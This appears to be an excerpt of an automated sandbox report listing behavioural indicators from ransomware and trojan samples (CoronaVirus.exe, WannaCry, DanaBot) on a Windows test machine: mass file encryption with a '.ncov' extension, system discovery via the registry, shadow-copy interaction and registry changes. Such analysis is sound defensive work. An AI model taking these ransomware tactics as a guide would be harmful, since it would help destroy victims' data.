File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\ProfessionalR_Retail-ul-oob.xrm-ms.id-A86C441F.[[email protected]].ncov C:\Users\Admin\Downloads\CoronaVirus.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\OFFICE16\api-ms-win-crt-time-l1-1-0.dll.id-A86C441F.[[email protected]].ncov C:\Users\Admin\Downloads\CoronaVirus.exe N/A
File created C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\6.0.27\System.Security.Cryptography.ProtectedData.dll.id-A86C441F.[[email protected]].ncov C:\Users\Admin\Downloads\CoronaVirus.exe N/A
File opened for modification C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\7.0.16\ja\System.Xaml.resources.dll C:\Users\Admin\Downloads\CoronaVirus.exe N/A
File created C:\Program Files\Microsoft Office\root\Licenses16\HomeBusiness2019R_OEM_Perp-pl.xrm-ms.id-A86C441F.[[email protected]].ncov C:\Users\Admin\Downloads\CoronaVirus.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\PersonalR_OEM_Perp-pl.xrm-ms C:\Users\Admin\Downloads\CoronaVirus.exe N/A
File opened for modification C:\Program Files\VideoLAN\VLC\plugins\codec\liblpcm_plugin.dll C:\Users\Admin\Downloads\CoronaVirus.exe N/A
File created C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\BHO\ie_to_edge_bho.dll.id-A86C441F.[[email protected]].ncov C:\Users\Admin\Downloads\CoronaVirus.exe N/A
File created C:\Program Files\dotnet\shared\Microsoft.NETCore.App\7.0.16\System.Private.Uri.dll.id-A86C441F.[[email protected]].ncov C:\Users\Admin\Downloads\CoronaVirus.exe N/A
File created C:\Program Files\dotnet\swidtag\Microsoft Windows Desktop Runtime - 8.0.2 (x64).swidtag.id-A86C441F.[[email protected]].ncov C:\Users\Admin\Downloads\CoronaVirus.exe N/A
File opened for modification C:\Program Files\Java\jre-1.8\bin\api-ms-win-core-sysinfo-l1-1-0.dll C:\Users\Admin\Downloads\CoronaVirus.exe N/A
File opened for modification C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\8.0.2\ko\UIAutomationTypes.resources.dll C:\Users\Admin\Downloads\CoronaVirus.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\SATIN\PREVIEW.GIF C:\Users\Admin\Downloads\CoronaVirus.exe N/A
File created C:\Program Files\Java\jre-1.8\bin\zip.dll.id-A86C441F.[[email protected]].ncov C:\Users\Admin\Downloads\CoronaVirus.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\ProjectPro2019VL_KMS_Client_AE-ul.xrm-ms.id-A86C441F.[[email protected]].ncov C:\Users\Admin\Downloads\CoronaVirus.exe N/A
File opened for modification C:\Program Files\Java\jre-1.8\lib\security\public_suffix_list.dat.id-A86C441F.[[email protected]].ncov C:\Users\Admin\Downloads\CoronaVirus.exe N/A
File opened for modification C:\Program Files\dotnet\shared\Microsoft.NETCore.App\7.0.16\System.Net.HttpListener.dll C:\Users\Admin\Downloads\CoronaVirus.exe N/A
File opened for modification C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\8.0.2\cs\System.Xaml.resources.dll C:\Users\Admin\Downloads\CoronaVirus.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\vfs\Fonts\private\WINGDNG2.TTF C:\Users\Admin\Downloads\CoronaVirus.exe N/A
File opened for modification C:\Program Files\VideoLAN\VLC\lua\playlist\anevia_xml.luac C:\Users\Admin\Downloads\CoronaVirus.exe N/A
File created C:\Program Files (x86)\Microsoft\EdgeUpdate_bk\1.3.147.37\msedgeupdateres_ko.dll.id-A86C441F.[[email protected]].ncov C:\Users\Admin\Downloads\CoronaVirus.exe N/A
File opened for modification C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.27\System.Threading.Timer.dll.id-A86C441F.[[email protected]].ncov C:\Users\Admin\Downloads\CoronaVirus.exe N/A
File created C:\Program Files\Java\jdk-1.8\jre\bin\j2pcsc.dll.id-A86C441F.[[email protected]].ncov C:\Users\Admin\Downloads\CoronaVirus.exe N/A
File created C:\Program Files\Microsoft Office\root\Office16\CSIRESOURCES.DLL.id-A86C441F.[[email protected]].ncov C:\Users\Admin\Downloads\CoronaVirus.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\Publisher2019R_Retail-ppd.xrm-ms.id-A86C441F.[[email protected]].ncov C:\Users\Admin\Downloads\CoronaVirus.exe N/A
File created C:\Program Files\Microsoft Office\root\Licenses16\VisioStdO365R_SubTest-ppd.xrm-ms.id-A86C441F.[[email protected]].ncov C:\Users\Admin\Downloads\CoronaVirus.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\VisioStd2019R_Retail-ppd.xrm-ms.id-A86C441F.[[email protected]].ncov C:\Users\Admin\Downloads\CoronaVirus.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\ResiliencyLinks\Locales\lt.pak.DATA C:\Users\Admin\Downloads\CoronaVirus.exe N/A
File opened for modification C:\Program Files (x86)\WindowsPowerShell\Modules\PackageManagement\1.0.0.1\DSCResources\MSFT_PackageManagement\es-ES\MSFT_PackageManagement.schema.mfl C:\Users\Admin\Downloads\CoronaVirus.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000018\cardview\lib\native-common\assets\[email protected] C:\Users\Admin\Downloads\CoronaVirus.exe N/A
File created C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\7.0.16\ru\Microsoft.VisualBasic.Forms.resources.dll.id-A86C441F.[[email protected]].ncov C:\Users\Admin\Downloads\CoronaVirus.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\O365SmallBusPremR_SubTrial4-pl.xrm-ms C:\Users\Admin\Downloads\CoronaVirus.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Office16\PEOPLEDATAHANDLER.DLL C:\Users\Admin\Downloads\CoronaVirus.exe N/A
File created C:\Program Files\Microsoft Office\root\vfs\System\mfcm140u.dll.id-A86C441F.[[email protected]].ncov C:\Users\Admin\Downloads\CoronaVirus.exe N/A
File opened for modification C:\Program Files\WindowsPowerShell\Modules\PackageManagement\1.0.0.1\DSCResources\MSFT_PackageManagementSource\ja-JP\MSFT_PackageManagementSource.strings.psd1.id-A86C441F.[[email protected]].ncov C:\Users\Admin\Downloads\CoronaVirus.exe N/A
File created C:\Program Files (x86)\Common Files\Microsoft Shared\VSTA\Pipeline.v10.0\HostSideAdapters\Microsoft.VisualStudio.Tools.Office.Word.HostAdapter.v10.0.dll.id-A86C441F.[[email protected]].ncov C:\Users\Admin\Downloads\CoronaVirus.exe N/A
File created C:\Program Files\Java\jdk-1.8\bin\native2ascii.exe.id-A86C441F.[[email protected]].ncov C:\Users\Admin\Downloads\CoronaVirus.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Client\api-ms-win-crt-private-l1-1-0.dll C:\Users\Admin\Downloads\CoronaVirus.exe N/A
File created C:\Program Files\Microsoft Office\root\Licenses16\Personal2019R_Trial-ul-oob.xrm-ms.id-A86C441F.[[email protected]].ncov C:\Users\Admin\Downloads\CoronaVirus.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Office16\Wordcnvr.dll C:\Users\Admin\Downloads\CoronaVirus.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\vfs\Fonts\private\REFSPCL.TTF.id-A86C441F.[[email protected]].ncov C:\Users\Admin\Downloads\CoronaVirus.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\SPRING\SPRING.INF.id-A86C441F.[[email protected]].ncov C:\Users\Admin\Downloads\CoronaVirus.exe N/A
File created C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\8.0.2\zh-Hant\UIAutomationClientSideProviders.resources.dll.id-A86C441F.[[email protected]].ncov C:\Users\Admin\Downloads\CoronaVirus.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\ProjectPro2019R_PrepidBypass-ppd.xrm-ms.id-A86C441F.[[email protected]].ncov C:\Users\Admin\Downloads\CoronaVirus.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\Standard2019R_Grace-ppd.xrm-ms.id-A86C441F.[[email protected]].ncov C:\Users\Admin\Downloads\CoronaVirus.exe N/A
File opened for modification C:\Program Files\Google\Chrome\Application\123.0.6312.123\chrome_wer.dll C:\Users\Admin\Downloads\CoronaVirus.exe N/A
File created C:\Program Files\Microsoft Office\root\Office16\1033\WINWORD_K_COL.HXK.id-A86C441F.[[email protected]].ncov C:\Users\Admin\Downloads\CoronaVirus.exe N/A
File opened for modification C:\Program Files\VideoLAN\VLC\plugins\control\libdummy_plugin.dll C:\Users\Admin\Downloads\CoronaVirus.exe N/A
File opened for modification C:\Program Files\VideoLAN\VLC\plugins\video_output\libdrawable_plugin.dll C:\Users\Admin\Downloads\CoronaVirus.exe N/A
File created C:\Program Files\Java\jdk-1.8\legal\jdk\santuario.md.id-A86C441F.[[email protected]].ncov C:\Users\Admin\Downloads\CoronaVirus.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Document Themes 16\Theme Colors\Blue Green.xml.id-A86C441F.[[email protected]].ncov C:\Users\Admin\Downloads\CoronaVirus.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\rsod\powerpointmui.msi.16.en-us.tree.dat.id-A86C441F.[[email protected]].ncov C:\Users\Admin\Downloads\CoronaVirus.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\ProjectProXC2RVL_KMS_ClientC2R-ppd.xrm-ms C:\Users\Admin\Downloads\CoronaVirus.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Office16\CSS7DATA0009.DLL C:\Users\Admin\Downloads\CoronaVirus.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Office16\SETLANG.EXE.id-A86C441F.[[email protected]].ncov C:\Users\Admin\Downloads\CoronaVirus.exe N/A
File created C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\api-ms-win-crt-locale-l1-1-0.dll.id-A86C441F.[[email protected]].ncov C:\Users\Admin\Downloads\CoronaVirus.exe N/A

Browser Information Discovery

discovery

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\Downloads\taskse.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cscript.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\Downloads\taskdl.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\Downloads\WannaCry.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\Downloads\!WannaDecryptor!.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\Downloads\taskse.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\Downloads\taskdl.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\Downloads\taskdl.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cscript.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\Downloads\taskdl.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\Downloads\taskse.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\Downloads\taskdl.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\Downloads\@[email protected] N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\Downloads\@[email protected] N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\attrib.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\Downloads\@[email protected] N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\is-A3D3N.tmp\butterflyondesktop.tmp N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\Downloads\@[email protected] N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\Downloads\taskse.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\Downloads\taskdl.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\Downloads\taskdl.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\Downloads\@[email protected] N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\Downloads\@[email protected] N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\Downloads\@[email protected] N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\Downloads\@[email protected] N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\Downloads\CoronaVirus.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\Downloads\taskdl.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\Downloads\taskdl.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\Downloads\taskdl.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\Downloads\@[email protected] N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\Downloads\DanaBot.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\Downloads\!WannaDecryptor!.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\Downloads\@[email protected] N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\Downloads\taskse.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\Downloads\taskse.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\Downloads\NoMoreRansom.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files (x86)\Butterfly on Desktop\ButterflyOnDesktop.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\Downloads\WannaCrypt0r (1).exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\attrib.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\Downloads\000.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\Downloads\taskse.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\Downloads\taskse.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\Downloads\@[email protected] N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\attrib.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\Downloads\@[email protected] N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\Downloads\@[email protected] N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A

Checks SCSI registry key(s)

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName C:\Windows\system32\taskmgr.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000 C:\Windows\system32\taskmgr.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A C:\Windows\system32\taskmgr.exe N/A

Checks processor information in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz C:\Program Files\Mozilla Firefox\firefox.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Interacts with shadow copies

ransomware
Description Indicator Process Target
N/A N/A C:\Windows\system32\vssadmin.exe N/A
N/A N/A C:\Windows\system32\vssadmin.exe N/A

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-87863914-780023816-688321450-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-87863914-780023816-688321450-1000\SOFTWARE\Microsoft\Internet Explorer\Recovery\AdminActive\{71A6D7A3-9EC1-11EF-9346-C6C8B2E6F645} = "0" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-87863914-780023816-688321450-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-87863914-780023816-688321450-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FullScreen = "no" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-87863914-780023816-688321450-1000\SOFTWARE\Microsoft\Internet Explorer\GPU\AdapterInfo = "vendorId=\"0x10de\",deviceID=\"0x8c\",subSysID=\"0x0\",revision=\"0x0\",version=\"10.0.19041.4355\"hypervisor=\"No Hypervisor (No SLAT)\"" C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Set value (int) \REGISTRY\USER\S-1-5-21-87863914-780023816-688321450-1000\SOFTWARE\Microsoft\Internet Explorer\IESettingSync\SlowSettingTypesChanged = "2" C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Set value (int) \REGISTRY\USER\S-1-5-21-87863914-780023816-688321450-1000\SOFTWARE\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-87863914-780023816-688321450-1000\SOFTWARE\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-87863914-780023816-688321450-1000\Software\Microsoft\Internet Explorer\Main C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Set value (int) \REGISTRY\USER\S-1-5-21-87863914-780023816-688321450-1000\SOFTWARE\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-87863914-780023816-688321450-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-87863914-780023816-688321450-1000\Software\Microsoft\Internet Explorer\Main C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-87863914-780023816-688321450-1000\Software\Microsoft\Internet Explorer\GPU C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-87863914-780023816-688321450-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-87863914-780023816-688321450-1000\Software\Microsoft\Internet Explorer\IESettingSync C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Set value (str) \REGISTRY\USER\S-1-5-21-87863914-780023816-688321450-1000\SOFTWARE\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A

Modifies registry class

Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\txtfile\DefaultIcon\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\icon.ico" C:\Users\Admin\Downloads\000.exe N/A
Key created \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-87863914-780023816-688321450-1000\{40F952B0-E7D8-40DF-840D-7EDD5B991F4A} C:\Users\Admin\Downloads\000.exe N/A

Modifies registry key

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\reg.exe N/A

NTFS ADS

Description Indicator Process Target
File opened for modification C:\Users\Admin\Downloads\Unconfirmed 412718.crdownload:SmartScreen C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File opened for modification C:\Users\Admin\Downloads\Unconfirmed 423497.crdownload:SmartScreen C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
N/A N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
N/A N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
N/A N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
N/A N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
N/A N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
N/A N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
